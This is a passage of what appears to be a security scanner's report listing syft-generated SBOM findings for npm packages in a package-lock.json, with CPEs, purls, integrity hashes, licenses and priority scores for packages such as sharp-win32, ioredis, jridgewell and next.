|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-win32-ia32@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz
|
|
integrity: sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ab5d55aa7d2a17c8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-win32-x64 0.34.5'
|
|
title: '@img/sharp-win32-x64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-win32-x64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e8052476c35410ff
|
|
name: '@img/sharp-win32-x64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0 AND LGPL-3.0-or-later
|
|
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-win32-x64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz
|
|
integrity: sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ab76bfe90efb399f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @ioredis/commands 1.5.1'
|
|
title: '@ioredis/commands 1.5.1'
|
|
description: 'Package discovered: @ioredis/commands 1.5.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 58cb7ee4da366532
|
|
name: '@ioredis/commands'
|
|
version: 1.5.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@ioredis\/commands:\@ioredis\/commands:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40ioredis/commands@1.5.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz
|
|
integrity: sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2bd603d91182e49c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @isaacs/cliui 8.0.2'
|
|
title: '@isaacs/cliui 8.0.2'
|
|
description: 'Package discovered: @isaacs/cliui 8.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1157d16cad8b2ffc
|
|
name: '@isaacs/cliui'
|
|
version: 8.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@isaacs\/cliui:\@isaacs\/cliui:8.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40isaacs/cliui@8.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz
|
|
integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==
|
|
dependencies:
|
|
string-width: ^5.1.2
|
|
string-width-cjs: npm:string-width@^4.2.0
|
|
strip-ansi: ^7.0.1
|
|
strip-ansi-cjs: npm:strip-ansi@^6.0.1
|
|
wrap-ansi: ^8.1.0
|
|
wrap-ansi-cjs: npm:wrap-ansi@^7.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5c9bb2e998c9fa3b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @jridgewell/gen-mapping 0.3.13'
|
|
title: '@jridgewell/gen-mapping 0.3.13'
|
|
description: 'Package discovered: @jridgewell/gen-mapping 0.3.13'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 93582717df76767f
|
|
name: '@jridgewell/gen-mapping'
|
|
version: 0.3.13
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40jridgewell/gen-mapping@0.3.13
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz
|
|
integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==
|
|
dependencies:
|
|
'@jridgewell/sourcemap-codec': ^1.5.0
|
|
'@jridgewell/trace-mapping': ^0.3.24
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 843924b3be64bc5f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @jridgewell/resolve-uri 3.1.2'
|
|
title: '@jridgewell/resolve-uri 3.1.2'
|
|
description: 'Package discovered: @jridgewell/resolve-uri 3.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 82452eb5459f3fba
|
|
name: '@jridgewell/resolve-uri'
|
|
version: 3.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40jridgewell/resolve-uri@3.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz
|
|
integrity: sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c541a28057efb07d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5'
|
|
title: '@jridgewell/sourcemap-codec 1.5.5'
|
|
description: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 47804e8101ff9015
|
|
name: '@jridgewell/sourcemap-codec'
|
|
version: 1.5.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40jridgewell/sourcemap-codec@1.5.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz
|
|
integrity: sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 17f518740ec1a2d8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @jridgewell/trace-mapping 0.3.31'
|
|
title: '@jridgewell/trace-mapping 0.3.31'
|
|
description: 'Package discovered: @jridgewell/trace-mapping 0.3.31'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d2b0bb94bbc32d3e
|
|
name: '@jridgewell/trace-mapping'
|
|
version: 0.3.31
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40jridgewell/trace-mapping@0.3.31
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz
|
|
integrity: sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==
|
|
dependencies:
|
|
'@jridgewell/resolve-uri': ^3.1.0
|
|
'@jridgewell/sourcemap-codec': ^1.4.14
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 104bcdf3fd6a7ac2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @js-sdsl/ordered-map 4.4.2'
|
|
title: '@js-sdsl/ordered-map 4.4.2'
|
|
description: 'Package discovered: @js-sdsl/ordered-map 4.4.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 886fcbec7936d83f
|
|
name: '@js-sdsl/ordered-map'
|
|
version: 4.4.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@js:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40js-sdsl/ordered-map@4.4.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz
|
|
integrity: sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9fea893a2745b477
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/env 14.2.3'
|
|
title: '@next/env 14.2.3'
|
|
description: 'Package discovered: @next/env 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 18ad44792e37660e
|
|
name: '@next/env'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/env:\@next\/env:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/env@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz
|
|
integrity: sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 258c6f6b4bc11247
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-darwin-arm64 14.2.3'
|
|
title: '@next/swc-darwin-arm64 14.2.3'
|
|
description: 'Package discovered: @next/swc-darwin-arm64 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bdb25bdc1adfe20f
|
|
name: '@next/swc-darwin-arm64'
|
|
version: 14.2.3
|
|
